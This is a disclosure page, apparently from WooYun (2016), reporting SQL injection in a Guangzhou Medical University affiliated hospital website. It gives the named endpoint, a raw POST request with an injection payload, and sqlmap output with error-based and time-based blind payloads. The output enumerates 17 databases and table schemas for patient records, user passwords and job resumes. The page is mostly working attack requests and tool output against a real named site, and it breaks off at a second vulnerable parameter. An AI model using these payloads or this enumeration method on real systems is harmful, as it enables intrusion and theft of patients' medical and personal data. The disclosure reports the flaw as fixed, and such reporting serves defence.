当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0211611

漏洞标题:广州医科大学某附属医院存在多处SQL注入漏洞(17库)

相关厂商:gzhmu.edu.cn

漏洞作者: 路人甲

提交时间:2016-05-23 15:28

修复时间:2016-05-24 09:56

公开时间:2016-05-24 09:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-23: 细节已通知厂商并且等待厂商处理中
2016-05-24: 厂商已经确认,细节仅向厂商公开
2016-05-24: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

广州医科大学某附属医院存在SQL注入漏洞 17库

详细说明:

1.参数:tst&txtSCode

http://www.gy3y.com:80/API/TipHandler.ashx (POST)
fn=getresult&txtEmail=sample@email.tst&txtSCode=-1*


POST /API/TipHandler.ashx HTTP/1.1
Content-Length: 116
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.gy3y.com/
Cookie: ASP.NET_SessionId=t4kpl01delq4mjcq3qsdki1r; v="2016052210011700077312700181007386|::"; opxPID=2016052210011700077312700181007386; u=1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|; JSESSIONID=9E1564ED74AE9583CEBA0E891D5E9E62
Host: www.gy3y.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
fn=getresult&txtEmail=sample%40email.tst&txtSCode=-1'%20OR%203*2*1%3d6%20AND%20000739%3d000739%20or%20'bjQoX1tH'%3d'

漏洞证明:

验证:

sqlmap identified the following injection point(s) with a total of 207 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: fn=getresult&txtEmail=sample@email.tst&txtSCode=-1' AND 1699=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (1699=1699) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(113)))-- vVSP
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: fn=getresult&txtEmail=sample@email.tst&txtSCode=-1' OR 3443=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)-- QFft
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008


--current-user

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: fn=getresult&txtEmail=sample@email.tst&txtSCode=-1' AND 1699=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (1699=1699) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(113)))-- vVSP
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: fn=getresult&txtEmail=sample@email.tst&txtSCode=-1' OR 3443=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)-- QFft
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
current user: 'gy3y_new'


--current-db

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: fn=getresult&txtEmail=sample@email.tst&txtSCode=-1' AND 1699=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (1699=1699) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(113)))-- vVSP
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: fn=getresult&txtEmail=sample@email.tst&txtSCode=-1' OR 3443=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)-- QFft
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
current database: 'gy3y'


--dbs

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: fn=getresult&txtEmail=sample@email.tst&txtSCode=-1' AND 1699=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (1699=1699) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(113)))-- vVSP
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: fn=getresult&txtEmail=sample@email.tst&txtSCode=-1' OR 3443=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)-- QFft
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [17]:
[*] by_gtmi
[*] by_gy3y_dnk
[*] by_gy3y_nkjy
[*] by_gy3y_partyschool
[*] exam_F
[*] exam_gys
[*] gdlisxp
[*] gy3y
[*] gy3y_gdklmod
[*] gy3y_young
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] ScienResearch
[*] tempdb


--columns

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: fn=getresult&txtEmail=sample@email.tst&txtSCode=-1' AND 1699=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (1699=1699) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(113)))-- vVSP
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: fn=getresult&txtEmail=sample@email.tst&txtSCode=-1' OR 3443=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)-- QFft
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: gy3y
Table: vW_AURoleGroup
[7 columns]
+-------------+---------+
| Column | Type |
+-------------+---------+
| GroupID | int |
| GroupName | varchar |
| RoleGroupID | int |
| RoleID | int |
| RoleName | varchar |
| SystemID | int |
| SystemName | varchar |
+-------------+---------+
Database: gy3y
Table: vW_Action_log
[11 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| ActionContentID | int |
| ActionID | int |
| ActionSystemID | int |
| ActionTable | varchar |
| ActionTime | datetime |
| ActionType | varchar |
| ActorAccount | varchar |
| ActorID | int |
| ActorName | varchar |
| Remark | varchar |
| SystemName | varchar |
+-----------------+----------+
Database: gy3y
Table: DRScheduleLog
[6 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| DeptID | int |
| DoctorID | int |
| SchID | int |
| TimeMark | int |
| WorkDate | datetime |
| WrokStateid | int |
+-------------+----------+
Database: gy3y
Table: vW_Member
[17 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| Address | nvarchar |
| Birthday | datetime |
| CardID | nvarchar |
| CreateDate | datetime |
| Detail | nvarchar |
| Email | nvarchar |
| HealCardNum | nvarchar |
| HealthHistory | nvarchar |
| Integral | int |
| NickName | nvarchar |
| Pid | int |
| PIID | int |
| RealName | nvarchar |
| Sex | int |
| Stateid | int |
| TelNum | nvarchar |
| Type | int |
+---------------+----------+
Database: gy3y
Table: CMSJob
[8 columns]
+----------------+---------------+
| Column | Type |
+----------------+---------------+
| ArticleID | int |
| DeptName | nvarchar |
| Expand | nvarchar |
| ExpirationDate | smalldatetime |
| HowMany | int |
| JobName | nvarchar |
| Location | nvarchar |
| Needs | nvarchar |
+----------------+---------------+
Database: gy3y
Table: CMSCode
[11 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| ClassID | int |
| CodeName | nvarchar |
| CreatedBy | int |
| CreatedDate | datetime |
| Description | nvarchar |
| EditType | int |
| HtmlCode | nvarchar |
| ID | int |
| ModifedDate | datetime |
| ModifyBy | int |
| StateID | int |
+-------------+----------+
Database: gy3y
Table: ResearchAnswer
[5 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| Answer | nvarchar |
| CreationDate | datetime |
| Id | int |
| Ip | nvarchar |
| QuestionId | int |
+--------------+----------+
Database: gy3y
Table: vW_UserGroupAtomSystem
[2 columns]
+----------+------+
| Column | Type |
+----------+------+
| SystemID | int |
| UserID | int |
+----------+------+
Database: gy3y
Table: AUUser
[6 columns]
+-------------+---------+
| Column | Type |
+-------------+---------+
| Description | varchar |
| Status | bit |
| UserAccount | varchar |
| UserID | int |
| UserKey | varchar |
| UserName | varchar |
+-------------+---------+
Database: gy3y
Table: Job
[14 columns]
+----------------+---------------+
| Column | Type |
+----------------+---------------+
| CreatedBy | int |
| CreatedDate | datetime |
| Expand | nvarchar |
| ExpirationDate | smalldatetime |
| HowMany | int |
| ID | int |
| JobName | nvarchar |
| Location | nvarchar |
| ModifedBy | int |
| ModifedDate | datetime |
| Needs | nvarchar |
| OrderNum | int |
| PublishDate | datetime |
| Stateid | int |
+----------------+---------------+
Database: gy3y
Table: DRRegisterData
[15 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| CardID | nvarchar |
| CardNum | nvarchar |
| CreateDate | datetime |
| Dept | nvarchar |
| DeptID | int |
| Detail | nvarchar |
| DoctorID | int |
| DoctorName | nvarchar |
| DRRegisterId | int |
| HISRegID | nvarchar |
| PIID | int |
| RegName | nvarchar |
| StateID | int |
| TelNum | nvarchar |
| TreatmenteDate | nvarchar |
+----------------+----------+
Database: gy3y
Table: AURoleGroup
[3 columns]
+-------------+------+
| Column | Type |
+-------------+------+
| GroupID | int |
| RoleGroupID | int |
| RoleID | int |
+-------------+------+
Database: gy3y
Table: CMSTemplate
[9 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| CreatedBy | int |
| CreatedDate | datetime |
| FullPath | nvarchar |
| Html | nvarchar |
| ID | int |
| ModifedDate | datetime |
| ModifyBy | int |
| Name | nvarchar |
| Stateid | int |
+-------------+----------+
Database: gy3y
Table: AUGroupUser
[3 columns]
+-------------+------+
| Column | Type |
+-------------+------+
| GroupID | int |
| GroupUserID | int |
| UserID | int |
+-------------+------+
Database: gy3y
Table: Searchs
[11 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| CreateTime | datetime |
| Deleted | bit |
| ESID | varchar |
| ID | bigint |
| SAbstract | nvarchar |
| SContent | nvarchar |
| SID | bigint |
| SKeyword | nvarchar |
| STableName | varchar |
| STitle | nvarchar |
| SWeight | int |
+------------+----------+
Database: gy3y
Table: AskAdditional
[9 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| Answer | nvarchar |
| AnswerBy | int |
| AnswerByType | int |
| AnswerTime | datetime |
| AskTime | datetime |
| ID | int |
| Question | nvarchar |
| QuestionID | int |
| Stateid | int |
+--------------+----------+
Database: gy3y
Table: AUSystem
[3 columns]
+------------+---------+
| Column | Type |
+------------+---------+
| IsValid | bit |
| SystemID | int |
| SystemName | varchar |
+------------+---------+
Database: gy3y
Table: AUAtomRight
[4 columns]
+---------------+---------+
| Column | Type |
+---------------+---------+
| AtomRightID | int |
| AtomRightName | varchar |
| ControlID | varchar |
| RightPageID | int |
+---------------+---------+
Database: gy3y
Table: Passport
[18 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| CreateDate | datetime |
| Email | nvarchar |
| ExpiresTime | datetime |
| Face | nvarchar |
| Integral | int |
| Jk39PID | int |
| LastIP | varchar |
| NickName | nvarchar |
| Password | nvarchar |
| PID | int |
| RealName | nvarchar |
| Security | varchar |
| Stateid | int |
| TargetID | int |
| TelNum | nvarchar |
| Type | int |
| UserName | nvarchar |
| Verify | bigint |
+-------------+----------+
Database: gy3y
Table: AUGroup
[3 columns]
+-------------+---------+
| Column | Type |
+-------------+---------+
| Description | varchar |
| GroupID | int |
| GroupName | varchar |
+-------------+---------+
Database: gy3y
Table: VLog
[6 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| AccessTime | datetime |
| IncraseID | int |
| Remark | varchar |
| UserID | int |
| UserName | varchar |
| VerifyCode | varchar |
+------------+----------+
Database: gy3y
Table: Login_Log
[5 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| IP | varchar |
| LoginID | int |
| LoginTime | datetime |
| SystemID | int |
| UserID | int |
+-----------+----------+
Database: gy3y
Table: AUAtomRightGroup
[3 columns]
+------------------+------+
| Column | Type |
+------------------+------+
| AtomRightGroupID | int |
| AtomRightID | int |
| GroupID | int |
+------------------+------+
Database: gy3y
Table: vW_UserGroupRoleAtomSystem
[2 columns]
+----------+------+
| Column | Type |
+----------+------+
| SystemID | int |
| UserID | int |
+----------+------+
Database: gy3y
Table: CMSRecommend
[12 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| ClassID | int |
| Config | nvarchar |
| CreateBy | int |
| CreateDate | datetime |
| Detail | nvarchar |
| ID | int |
| ModefiedBy | int |
| ModefiedDate | datetime |
| OrderNum | int |
| RName | nvarchar |
| Stateid | int |
| Type | int |
+--------------+----------+
Database: gy3y
Table: AskAnswers
[12 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| Answer | nvarchar |
| AnswerType | int |
| CreatedBy | int |
| CreatedByType | int |
| CreatedDate | datetime |
| Detail | nvarchar |
| ID | int |
| ModifedDate | datetime |
| QuestionID | int |
| Stateid | int |
| Tag | nvarchar |
| Useful | int |
+---------------+----------+
Database: gy3y
Table: ConfigData
[3 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| ConfigID | int |
| ConfigName | nvarchar |
| ConfigXml | xml |
+------------+----------+
Database: gy3y
Table: DRSchedule
[10 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| CreateBy | int |
| CreatedDate | datetime |
| DepID | int |
| DeptTitle | varchar |
| DoctorID | int |
| ID | int |
| ModifedDate | datetime |
| ModifyBy | int |
| ScheduleSet | nvarchar |
| StateID | int |
+-------------+----------+
Database: gy3y
Table: AURightPage
[5 columns]
+----------------+---------+
| Column | Type |
+----------------+---------+
| PageCategoryID | int |
| PageName | varchar |
| PagePath | varchar |
| RightPageID | int |
| SystemID | int |
+----------------+---------+
Database: gy3y
Table: vW_UserAtomSystem
[2 columns]
+----------+------+
| Column | Type |
+----------+------+
| SystemID | int |
| UserID | int |
+----------+------+
Database: gy3y
Table: AURole
[3 columns]
+----------+---------+
| Column | Type |
+----------+---------+
| RoleID | int |
| RoleName | varchar |
| SystemID | int |
+----------+---------+
Database: gy3y
Table: Action_Log
[8 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| ActionContentID | int |
| ActionID | int |
| ActionSystemID | int |
| ActionTable | varchar |
| ActionTime | datetime |
| ActionType | varchar |
| ActorID | int |
| Remark | varchar |
+-----------------+----------+
Database: gy3y
Table: AskQuestion
[14 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| AskTo | int |
| AskToType | int |
| CreatedBy | int |
| CreatedTime | datetime |
| Detail | nvarchar |
| ID | int |
| ModifedBy | int |
| ModifedDate | datetime |
| Question | nvarchar |
| QuestionType | int |
| Stateid | int |
| Tag | nvarchar |
| Title | nvarchar |
| ViewCount | int |
+--------------+----------+
Database: gy3y
Table: vW_UserSystem
[2 columns]
+----------+------+
| Column | Type |
+----------+------+
| SystemID | int |
| UserID | int |
+----------+------+
Database: gy3y
Table: vW_SystemUser
[7 columns]
+-------------+---------+
| Column | Type |
+-------------+---------+
| Description | varchar |
| Status | bit |
| SystemID | int |
| UserAccount | varchar |
| UserID | int |
| UserKey | varchar |
| UserName | varchar |
+-------------+---------+
Database: gy3y
Table: DRDepartments
[13 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| CreateBy | int |
| CreatedDate | datetime |
| DepID | int |
| Detail | nvarchar |
| ModifedDate | datetime |
| ModifyBy | int |
| Name | nvarchar |
| OrderNum | int |
| ParentID | int |
| StateID | int |
| Tag | nvarchar |
| UnID | nvarchar |
| UnionClassID | int |
+--------------+----------+
Database: gy3y
Table: DRRegisterLog
[12 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| CreateDate | datetime |
| Detail | nvarchar |
| DRRegisterId | int |
| ID | int |
| IP | nchar |
| LogMsg | nvarchar |
| OperationalType | int |
| OperatorID | int |
| OperatorName | nvarchar |
| OperatorType | int |
| StateID | int |
| XForward | nvarchar |
+-----------------+----------+
Database: gy3y
Table: HistoryData
[8 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| Content | nvarchar |
| CreatedBy | int |
| CreatedDate | datetime |
| FieldName | nvarchar |
| HistoryID | int |
| MD5 | nchar |
| PK | int |
| TableName | nvarchar |
+-------------+----------+
Database: gy3y
Table: DRDoctor
[18 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| BeGoodAt | nvarchar |
| CreateBy | int |
| CreatedDate | datetime |
| DeptID | int |
| Detail | nvarchar |
| DoctorID | int |
| Edu | int |
| ModifedDate | datetime |
| ModifyBy | int |
| Name | nvarchar |
| NameMore | nvarchar |
| OrderNum | int |
| Sex | int |
| StateID | int |
| Tag | nvarchar |
| ThumbImageURL | varchar |
| Title | varchar |
| UnID | nvarchar |
+---------------+----------+
Database: gy3y
Table: RecycleResearchAnswer
[5 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| Answer | nvarchar |
| CreationDate | datetime |
| Id | int |
| Ip | nvarchar |
| QuestionId | int |
+--------------+----------+
Database: gy3y
Table: vW_AUAtomRightGroup
[7 columns]
+------------------+---------+
| Column | Type |
+------------------+---------+
| AtomRightGroupID | int |
| AtomRightID | int |
| AtomRightName | varchar |
| GroupID | int |
| GroupName | varchar |
| PageName | varchar |
| PagePath | varchar |
+------------------+---------+
Database: gy3y
Table: AUMenu
[7 columns]
+-------------+---------+
| Column | Type |
+-------------+---------+
| MenuID | int |
| MenuName | varchar |
| MenuPath | varchar |
| OrderNum | int |
| ParentID | int |
| RightPageID | int |
| SystemID | int |
+-------------+---------+
Database: gy3y
Table: vW_AURole
[4 columns]
+------------+---------+
| Column | Type |
+------------+---------+
| RoleID | int |
| RoleName | varchar |
| SystemID | int |
| SystemName | varchar |
+------------+---------+
Database: gy3y
Table: ResearchQuestion
[12 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| AnswerCount | int |
| ArticleId | int |
| CreatedBy | int |
| CreatedDate | datetime |
| Id | int |
| ModifiedDate | datetime |
| ModifyBy | int |
| Options | nvarchar |
| Order | int |
| QuestionType | int |
| Required | bit |
| Title | nvarchar |
+--------------+----------+
Database: gy3y
Table: AUPageCategory
[5 columns]
+----------------+---------+
| Column | Type |
+----------------+---------+
| CategoryName | varchar |
| OrderNum | int |
| PageCategoryID | int |
| ParentID | int |
| SystemID | int |
+----------------+---------+
Database: gy3y
Table: TipOffAdd
[8 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| CreatedDate | datetime |
| ID | int |
| Question | nvarchar |
| ReplyBy | int |
| ReplyDate | datetime |
| ReplyTxt | nvarchar |
| StateId | int |
| TipOffID | int |
+-------------+----------+
Database: gy3y
Table: vW_AURoleUser
[9 columns]
+-------------+---------+
| Column | Type |
+-------------+---------+
| RoleID | int |
| RoleName | varchar |
| RoleUserID | int |
| Status | bit |
| SystemID | int |
| SystemName | varchar |
| UserAccount | varchar |
| UserID | int |
| UserName | varchar |
+-------------+---------+
Database: gy3y
Table: AURoleUser
[3 columns]
+------------+------+
| Column | Type |
+------------+------+
| RoleID | int |
| RoleUserID | int |
| UserID | int |
+------------+------+
Database: gy3y
Table: CMSPicture
[13 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| ArticleID | int |
| CreatedBy | int |
| CreatedDate | datetime |
| Description | nvarchar |
| IsCover | bit |
| ModifiedDate | datetime |
| ModifyBy | int |
| OrderNum | int |
| OrgImgUrl | varchar |
| PictureID | int |
| StateID | smallint |
| ThumbImgInfo | varchar |
| Title | nvarchar |
+--------------+----------+
Database: gy3y
Table: AUClassRight
[4 columns]
+---------+------+
| Column | Type |
+---------+------+
| ClassID | int |
| ID | int |
| ObjID | int |
| ObjType | int |
+---------+------+
Database: gy3y
Table: vW_AUAtomRightRole
[7 columns]
+-----------------+---------+
| Column | Type |
+-----------------+---------+
| AtomRightID | int |
| AtomRightName | varchar |
| AtomRightRoleID | int |
| PageName | varchar |
| PagePath | varchar |
| RoleID | int |
| RoleName | varchar |
+-----------------+---------+
Database: gy3y
Table: CMSCLass
[20 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| ArticlePath | varchar |
| ArticleTemplate | int |
| ArticleTypes | varchar |
| ArticleUrlType | int |
| ClassName | nvarchar |
| ClassType | int |
| CreatedBy | int |
| CreatedDate | datetime |
| Description | nvarchar |
| FilePath | nvarchar |
| ForumUrl | varchar |
| ID | int |
| KeyWord | nvarchar |
| ModifedDate | datetime |
| ModifyBy | int |
| OrderNum | int |
| ParentID | int |
| SName | nvarchar |
| Stateid | smallint |
| Title | nvarchar |
+-----------------+----------+
Database: gy3y
Table: CMSRecommedArticles
[12 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| ArticleID | int |
| CreatedBy | int |
| CreatedDate | datetime |
| Detail | nvarchar |
| ID | int |
| LinkUrl | nvarchar |
| ModefiedBy | int |
| ModefiedDate | datetime |
| OrderNum | int |
| PublishDate | datetime |
| RecommendID | int |
| Title | nvarchar |
+--------------+----------+
Database: gy3y
Table: TipOff
[13 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| BeInformer | nvarchar |
| BeInformerDetail | nvarchar |
| CreatedDate | datetime |
| Email | nvarchar |
| ID | int |
| Informer | nvarchar |
| InformerDetail | nvarchar |
| ReplyBy | int |
| ReplyDate | datetime |
| ReplyTxt | nvarchar |
| SecurityCode | varchar |
| StateId | int |
| TelNum | nvarchar |
+------------------+----------+
Database: gy3y
Table: PatientInfo
[12 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| Address | nvarchar |
| Birthday | datetime |
| CardID | nvarchar |
| CreateDate | datetime |
| Detail | nvarchar |
| HealCardNum | nvarchar |
| HealthHistory | nvarchar |
| Pid | int |
| PIID | int |
| RealName | nvarchar |
| Sex | int |
| TelNum | nvarchar |
+---------------+----------+
Database: gy3y
Table: CMSArticle
[25 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| Abstract | nvarchar |
| ArticleID | int |
| ArticleType | smallint |
| ArticleUrl | nvarchar |
| Attribute | int |
| Author | nvarchar |
| ClassID | int |
| ControlledStyle | nvarchar |
| ControlledTitle | nvarchar |
| CreatedBy | int |
| CreatedDate | datetime |
| KeyWord | nvarchar |
| ModifedDate | datetime |
| ModifyBy | int |
| OrderNum | int |
| PublisDate | datetime |
| Source | nvarchar |
| SourceUrl | nvarchar |
| StateID | smallint |
| SubTitle | nvarchar |
| TemplateFilePath | nvarchar |
| ThumbImageURL | varchar |
| Title | nvarchar |
| TitleStyle | nvarchar |
| ViewCount | int |
+------------------+----------+
Database: gy3y
Table: AUAtomRightRole
[3 columns]
+-----------------+------+
| Column | Type |
+-----------------+------+
| AtomRightID | int |
| AtomRightRoleID | int |
| RoleID | int |
+-----------------+------+
Database: gy3y
Table: CMSArticleDetail_20140704
[2 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| ArticleID | int |
| Content | nvarchar |
+-----------+----------+
Database: gy3y
Table: JobResumes
[49 columns]
+-----------------------------+----------+
| Column | Type |
+-----------------------------+----------+
| Address | nvarchar |
| AwardPunitive | nvarchar |
| Birthday | datetime |
| CardID | nvarchar |
| ComputerLevel | nvarchar |
| CreatedDate | datetime |
| Edu | nvarchar |
| EduExperiences | nvarchar |
| EduLength | nvarchar |
| Edulevel | nvarchar |
| EduSpecialty | nvarchar |
| Email | nvarchar |
| Family | nvarchar |
| Fertility | nvarchar |
| ForeignLanguageLevel | nvarchar |
| FORWARDED | nvarchar |
| Height | int |
| Hometown | nvarchar |
| ID | int |
| JobID | int |
| JoinPartyDate | datetime |
| LearnForm | nvarchar |
| MaritalStateid | nvarchar |
| Name | nvarchar |
| Nation | nvarchar |
| Other | nvarchar |
| Partisan | nvarchar |
| Photo | nvarchar |
| PoliticalStateid | nvarchar |
| RecruitmentWay | nvarchar |
| RegisteredAddress | nvarchar |
| Remote | nvarchar |
| Research | nvarchar |
| School | nvarchar |
| Sex | int |
| Specialty | nvarchar |
| Stateid | int |
| TechnicalQualifications | nvarchar |
| TechnicalQualificationsDate | datetime |
| Tel | nvarchar |
| Tel2 | nvarchar |
| TemplateFilePath | nvarchar |
| Training | nvarchar |
| WorkExperience | nvarchar |
| WorkExperiences | nvarchar |
| WorkReason | nvarchar |
| WorkRelatives | nvarchar |
| WorkStateid | nvarchar |
| WorkUnit | nvarchar |
+-----------------------------+----------+
Database: gy3y
Table: vW_AUGroupUser
[7 columns]
+-------------+---------+
| Column | Type |
+-------------+---------+
| GroupID | int |
| GroupName | varchar |
| GroupUserID | int |
| Status | bit |
| UserAccount | varchar |
| UserID | int |
| UserName | varchar |
+-------------+---------+
Database: gy3y
Table: AUAtomRightUser
[3 columns]
+-----------------+------+
| Column | Type |
+-----------------+------+
| AtomRightID | int |
| AtomRightUserID | int |
| UserID | int |
+-----------------+------+
Database: gy3y
Table: CMSArticleDetail
[2 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| ArticleID | int |
| Content | nvarchar |
+-----------+----------+
Database: gy3y
Table: UpFile
[9 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| CreateBy | int |
| CreateDate | datetime |
| FileFullPath | nvarchar |
| FileType | int |
| id | int |
| Info | nvarchar |
| MD5 | char |
| Stateid | smallint |
| Url | nvarchar |
+--------------+----------+
Database: gy3y
Table: CMSArticleHistory
[7 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| Content | nvarchar |
| CreatedBy | int |
| CreatedDate | datetime |
| FieldName | nvarchar |
| HistoryID | int |
| PK | int |
| TableName | nvarchar |
+-------------+----------+
Database: gy3y
Table: vW_UserRoleSystem
[2 columns]
+----------+------+
| Column | Type |
+----------+------+
| SystemID | int |
| UserID | int |
+----------+------+
Database: gy3y
Table: vW_AUAtomRightUser
[9 columns]
+-----------------+---------+
| Column | Type |
+-----------------+---------+
| AtomRightID | int |
| AtomRightName | varchar |
| AtomRightUserID | int |
| PageName | varchar |
| PagePath | varchar |
| Status | bit |
| UserAccount | varchar |
| UserID | int |
| UserName | varchar |
+-----------------+---------+


2.参数:CardID

POST /api/post.aspx?callback=parent.SaveCallback&fn=jobResume HTTP/1.1
Content-Length: 907
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.gy3y.com/
Cookie: ASP.NET_SessionId=t4kpl01delq4mjcq3qsdki1r; v="2016052210011700077312700181007386|::"; opxPID=2016052210011700077312700181007386; u=1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|; JSESSIONID=9E1564ED74AE9583CEBA0E891D5E9E62
Host: www.gy3y.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
